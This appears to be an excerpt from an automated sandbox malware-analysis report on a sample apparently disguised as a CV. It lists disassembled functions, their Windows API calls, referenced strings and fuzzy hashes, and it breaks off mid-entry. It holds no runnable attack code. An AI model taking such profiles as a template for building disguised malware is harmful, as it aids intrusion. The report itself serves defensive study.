DestroyWindow.USER32(?,?), ref: 0035CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0035CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0035D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035D025
DestroyWindow.USER32(?), ref: 0035D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002F0000,00000000), ref: 0035D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035D094
GetDesktopWindow.USER32 ref: 0035D0A9
GetWindowRect.USER32(00000000), ref: 0035D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0035D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0035D0DA

Part of subcall function 0030B526: GetWindowLongW.USER32(?,000000EB), ref: 0030B537

Strings

tooltips_class32, xrefs: 0035CFED, 0035D06E
0, xrefs: 0035CF1B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: f520dab44cb0f3ff490b6f55e6cd267087295b7bfdf3687a17c15baa05e94c61
Instruction ID: 306895958bdb4086dc140ba60d63bbb246ee9ce6ea3cc783bfd8d66edd0596fd
Opcode Fuzzy Hash: f520dab44cb0f3ff490b6f55e6cd267087295b7bfdf3687a17c15baa05e94c61
Instruction Fuzzy Hash: D271BB70140305AFD726CF28CC85FA677E9EB88708F54461DFE858B2A1D774E946CB22

Function 0035F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

DragQueryPoint.SHELL32(?,?), ref: 0035F37A

Part of subcall function 0035D7DE: ClientToScreen.USER32(?,?), ref: 0035D807
Part of subcall function 0035D7DE: GetWindowRect.USER32(?,?), ref: 0035D87D
Part of subcall function 0035D7DE: PtInRect.USER32(?,?,0035ED5A), ref: 0035D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0035F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0035F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0035F411
_wcscat.LIBCMT ref: 0035F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0035F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0035F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0035F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0035F4AA
DragFinish.SHELL32(?), ref: 0035F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0035F59C

Strings

@GUI_DRAGFILE, xrefs: 0035F54B
@GUI_DRAGID, xrefs: 0035F510
@GUI_DROPID, xrefs: 0035F4D1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 7c45ad4a8ea6ff88ee6b9cac1117b7485c5a3c8663a0f746f505292b884f609b
Instruction ID: b9015ca89802d9c091dcdb04311af2681107b2733ce59497e348c55782a5f092
Opcode Fuzzy Hash: 7c45ad4a8ea6ff88ee6b9cac1117b7485c5a3c8663a0f746f505292b884f609b
Instruction Fuzzy Hash: A0616C71008304AFC312EF60CC45EAFBBF8EF89754F500A2DF695961A1DB709649CB52

Function 0033AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0033AB3D
VariantCopy.OLEAUT32(?,?), ref: 0033AB46
VariantClear.OLEAUT32(?), ref: 0033AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0033AC40
__swprintf.LIBCMT ref: 0033AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0033AC9C
VariantInit.OLEAUT32(?), ref: 0033AD4D
SysFreeString.OLEAUT32(00000016), ref: 0033ADDF
VariantClear.OLEAUT32(?), ref: 0033AE35
VariantClear.OLEAUT32(?), ref: 0033AE44
VariantInit.OLEAUT32(00000000), ref: 0033AE80

Strings

Default, xrefs: 0033ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0033AC6A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: c8c1e8e17c84d2a173ba37d12b375aeb9904a885130cbca5c100b2bbb7669686
Instruction ID: 01b14466abecbb92060b8f8f2cdb29345df9819408a3b6f07ac00f7af0374e93
Opcode Fuzzy Hash: c8c1e8e17c84d2a173ba37d12b375aeb9904a885130cbca5c100b2bbb7669686
Instruction Fuzzy Hash: 34D1F071A00A05DBDF229F65C8C5BBAF7B9FF04700F258065E4859B590DB74EC80DBA2

Function 0035716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003571FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00357247

Strings

COLLAPSE, xrefs: 0035728D
EXISTS, xrefs: 003572B0
GETTOTALCOUNT, xrefs: 0035722A
GETITEMCOUNT, xrefs: 00357311
GETSELECTED, xrefs: 0035733F
GETTEXT, xrefs: 00357382
SELECT, xrefs: 003573E0
CHECK, xrefs: 00357267
UNCHECK, xrefs: 0035740B
EXPAND, xrefs: 003572E1
ISCHECKED, xrefs: 003573B2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 492b27b0b73827beabf9539e1ad48a48d2dff1f8613cf34adc578f0b12bbfdbc
Instruction ID: 57df59c898b7838db438af9c822635032d2eab0424a514f8f6d2def7dc88d775
Opcode Fuzzy Hash: 492b27b0b73827beabf9539e1ad48a48d2dff1f8613cf34adc578f0b12bbfdbc
Instruction Fuzzy Hash: 91916E742087019BCB06EF20D851E6EB7A5AF94350F00486CFD966B7A2DB71ED5ACB81

Function 0032CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0032CF50), ref: 0032CE90

Strings

REGEXPCLASS, xrefs: 0032CC56
CLASSNN, xrefs: 0032CC33
L+:, xrefs: 0032CD14
T+:, xrefs: 0032CD72
TEXT, xrefs: 0032CDC7
4+:, xrefs: 0032CC96
INSTANCE, xrefs: 0032CD9E
CLASS, xrefs: 0032CC10
H+:, xrefs: 0032CCE8
NAME, xrefs: 0032CCC2
P+:, xrefs: 0032CD43

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+:$CLASS$CLASSNN$H+:$INSTANCE$L+:$NAME$P+:$REGEXPCLASS$T+:$TEXT
API String ID: 3555792229-992007435
Opcode ID: e07b45ce37e5e497d00293bba89fe58825f4e46776320c3996197b5fb4ff53f0
Instruction ID: 48fc6b3ac7fb863e51a33b367426c19db39b0c71644c816311b488ba6c94c45e
Opcode Fuzzy Hash: e07b45ce37e5e497d00293bba89fe58825f4e46776320c3996197b5fb4ff53f0
Instruction Fuzzy Hash: DD91C53061021AABCB1ADF60D481BEEFB75FF04340F519529E949B7191DF31699ACBE0

Function 0035E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0035E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00359808,?), ref: 0035E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0035E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0035E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0035E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00359808,?), ref: 0035E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035E6DF
DestroyIcon.USER32(?), ref: 0035E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0035E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0035E717

Part of subcall function 00310FA7: __wcsicmp_l.LIBCMT ref: 00311030

Strings

.icl, xrefs: 0035E521
.exe, xrefs: 0035E541
.dll, xrefs: 0035E564

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 2d65735dd0e7cb50d25987cfed2c6ca920e3ee5469809dfe47647b713893b4c0
Instruction ID: abdda2088b88eca77ae0928085243138b7f437d9c4c94dbd2c27179d47ae256e
Opcode Fuzzy Hash: 2d65735dd0e7cb50d25987cfed2c6ca920e3ee5469809dfe47647b713893b4c0
Instruction Fuzzy Hash: 7361C271500215BAEB2ADF64CC46FFE77ACBF18761F104515F915EA0E0EBB09A84CBA0

Function 0033D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

CharLowerBuffW.USER32(?,?), ref: 0033D292
GetDriveTypeW.KERNEL32 ref: 0033D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033D38C

Strings

close cd wait, xrefs: 0033D377
type cdaudio alias cd wait, xrefs: 0033D30A
wait, xrefs: 0033D349
set cd door , xrefs: 0033D32D
open, xrefs: 0033D2B9
close, xrefs: 0033D298
open , xrefs: 0033D2EE
closed, xrefs: 0033D2A6, 0033D2AF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 302ea18a45769a7048066a00c0b2cd354be5448e711a26cd911a47b7fb5b7720
Instruction ID: 6de08fa223ea34d779400565cffb958979f978812fec3e66b28c422ce3859247
Opcode Fuzzy Hash: 302ea18a45769a7048066a00c0b2cd354be5448e711a26cd911a47b7fb5b7720
Instruction Fuzzy Hash: 06515C756143089FC701EF10D99196AB3F8EF88758F10486CF98A672A1DB31EE05CF42

Function 003326BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00363973,00000016,0000138C,00000016,?,00000016,0038DDB4,00000000,?), ref: 003326F1
LoadStringW.USER32(00000000,?,00363973,00000016), ref: 003326FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00363973,00000016,0000138C,00000016,?,00000016,0038DDB4,00000000,?,00000016), ref: 0033271C
LoadStringW.USER32(00000000,?,00363973,00000016), ref: 0033271F
__swprintf.LIBCMT ref: 0033276F
__swprintf.LIBCMT ref: 00332780
_wprintf.LIBCMT ref: 00332829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00332840

Strings

^ ERROR, xrefs: 003327D5
Line %d:, xrefs: 0033277A
Line %d (File "%s"):, xrefs: 00332769
%s (%d) : ==> %s: %s %s, xrefs: 00332824
Error: , xrefs: 003327F7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 4480b853dd7b57b689b26b5be92c702ce2ac4ee0decfad843e0f93b7dccfd01e
Instruction ID: 92a2375483fa7a0242c9badf7d67085b41ec7aa6d6dee4b84062bbc82ea525d6
Opcode Fuzzy Hash: 4480b853dd7b57b689b26b5be92c702ce2ac4ee0decfad843e0f93b7dccfd01e
Instruction Fuzzy Hash: 14410B7280021DAACB16FBD0DE86EFFB778AF19384F100065B60576092EA746F59CE60

Function 0033D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0033D0D8
__swprintf.LIBCMT ref: 0033D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0033D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0033D15C
_memset.LIBCMT ref: 0033D17B
_wcsncpy.LIBCMT ref: 0033D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0033D1EC
CloseHandle.KERNEL32(00000000), ref: 0033D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0033D200
CloseHandle.KERNEL32(00000000), ref: 0033D20A

Strings

\??\%s, xrefs: 0033D0F4
\, xrefs: 0033D110
:, xrefs: 0033D11B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 0742e015c24c1725484402f842a9fb6f78ad843d38843d675f5d4942397fb65f
Instruction ID: 7b95731bde387331bb5857f660d68cfada3f6b28e2d0494630342c75eff060b0
Opcode Fuzzy Hash: 0742e015c24c1725484402f842a9fb6f78ad843d38843d675f5d4942397fb65f
Instruction Fuzzy Hash: 1631C4B6900109ABDB22DFA0EC89FEB77BDEF89700F1041B6F509D6161E770D6858B24

Function 003287CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0032882D
___wtomb_environ.LIBCMT ref: 0032884F

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

__malloc_crt.LIBCMT ref: 00328875
__malloc_crt.LIBCMT ref: 00328892
_free.LIBCMT ref: 003288C9
__recalloc_crt.LIBCMT ref: 00328902
__recalloc_crt.LIBCMT ref: 00328947
_strlen.LIBCMT ref: 00328973
__calloc_crt.LIBCMT ref: 0032897D
_strlen.LIBCMT ref: 0032898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 003289BA
_free.LIBCMT ref: 003289D4
_free.LIBCMT ref: 003289E1
_free.LIBCMT ref: 003289F3
__invoke_watson.LIBCMT ref: 00328A0D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 6f186310062a77477c9184a3e1ca644050d48d00f95586bccf7c6682c73eefca
Instruction ID: 2207187b29745b419c45df821f86657d7c587d151591d67703cfed21b5aad03d
Opcode Fuzzy Hash: 6f186310062a77477c9184a3e1ca644050d48d00f95586bccf7c6682c73eefca
Instruction Fuzzy Hash: A5610572902235EFDB2B5F64EC427BA37A8EF04764F254225E811AB1C1DF34D980CBA5

Function 0035E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0035E754
GetFileSize.KERNEL32(00000000,00000000), ref: 0035E76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 0035E776
CloseHandle.KERNEL32(00000000), ref: 0035E783
GlobalLock.KERNEL32(00000000), ref: 0035E78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0035E79B
GlobalUnlock.KERNEL32(00000000), ref: 0035E7A4
CloseHandle.KERNEL32(00000000), ref: 0035E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0035E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0037D9BC,?), ref: 0035E7D5
GlobalFree.KERNEL32(00000000), ref: 0035E7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 0035E809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0035E834
DeleteObject.GDI32(00000000), ref: 0035E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0035E872

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 3b24a73a88c9020d4014b70177c178b2383ca17fc2ecfd4abbf070d62d7bbdbb
Instruction ID: d360bb51f30ce9958cef7ec7ab0505e4c43471257bb7161edf37dcf809451eae
Opcode Fuzzy Hash: 3b24a73a88c9020d4014b70177c178b2383ca17fc2ecfd4abbf070d62d7bbdbb
Instruction Fuzzy Hash: 90415B75600204FFDB229F65DC88EAA7BBDEF89B11F108458F909E7260C7319E85DB60

Function 003405F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0034076F
_wcscat.LIBCMT ref: 00340787
_wcscat.LIBCMT ref: 00340799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003407AE
SetCurrentDirectoryW.KERNEL32(?), ref: 003407C2
GetFileAttributesW.KERNEL32(?), ref: 003407DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 003407F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00340806

Strings

*.*, xrefs: 00340845

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ce2e6ca238b4006d50a5d6550658a5f0782a55bc89945a0ea6269f67c13985ed
Instruction ID: 792541fb840b799cc5f53e6675f67e1aa9ca15e3576ec82ceb752f7478c464fd
Opcode Fuzzy Hash: ce2e6ca238b4006d50a5d6550658a5f0782a55bc89945a0ea6269f67c13985ed
Instruction Fuzzy Hash: 5081A2716043059FCB29DF64C44596EB7E8FF88300F15482EFA8ADB251E734E9948F92

Function 0035EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0035EF3B
GetFocus.USER32 ref: 0035EF4B
GetDlgCtrlID.USER32(00000000), ref: 0035EF56
_memset.LIBCMT ref: 0035F081
GetMenuItemInfoW.USER32 ref: 0035F0AC
GetMenuItemCount.USER32(00000000), ref: 0035F0CC
GetMenuItemID.USER32(?,00000000), ref: 0035F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0035F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0035F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0035F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0035F1C8

Strings

0, xrefs: 0035F079

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 3c8027fe2112f1609461cb3ec2fc2d9442ff3bfa48cf0e662266c7d2c4bae1ce
Instruction ID: 552be6e90f8c9aa259f9c14c5fbab6496a7a8e7a3c2a52cefb5f75e06a894af1
Opcode Fuzzy Hash: 3c8027fe2112f1609461cb3ec2fc2d9442ff3bfa48cf0e662266c7d2c4bae1ce
Instruction Fuzzy Hash: 41817870508301AFD726CF14C884E6ABBE9FF88315F15492EFD99972A1D730DA49CB92

Function 0032A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

